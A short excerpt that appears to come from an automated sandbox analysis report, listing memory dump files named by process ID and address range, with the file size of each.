                                                • memory/1116-348-0x00007FFEC54D0000-0x00007FFEC59F0000-memory.dmp

                                                  Filesize

                                                  5.1MB

                                                • memory/1116-347-0x00007FFEC59F0000-0x00007FFEC5ABD000-memory.dmp

                                                  Filesize

                                                  820KB

                                                • memory/1116-346-0x00007FFECEC60000-0x00007FFECEC93000-memory.dmp

                                                  Filesize

                                                  204KB

                                                • memory/1116-345-0x00007FFED5150000-0x00007FFED515D000-memory.dmp

                                                  Filesize

                                                  52KB

                                                • memory/1116-344-0x00007FFED5E80000-0x00007FFED5E99000-memory.dmp

                                                  Filesize

                                                  100KB

                                                • memory/1116-343-0x00007FFEC6290000-0x00007FFEC6407000-memory.dmp

                                                  Filesize

                                                  1.5MB

                                                • memory/1116-342-0x00007FFED12D0000-0x00007FFED12F3000-memory.dmp

                                                  Filesize

                                                  140KB

                                                • memory/4068-196-0x0000017E791B0000-0x0000017E791B8000-memory.dmp

                                                  Filesize

                                                  32KB

                                                • memory/4692-295-0x000002109AC70000-0x000002109ACB8000-memory.dmp

                                                  Filesize

                                                  288KB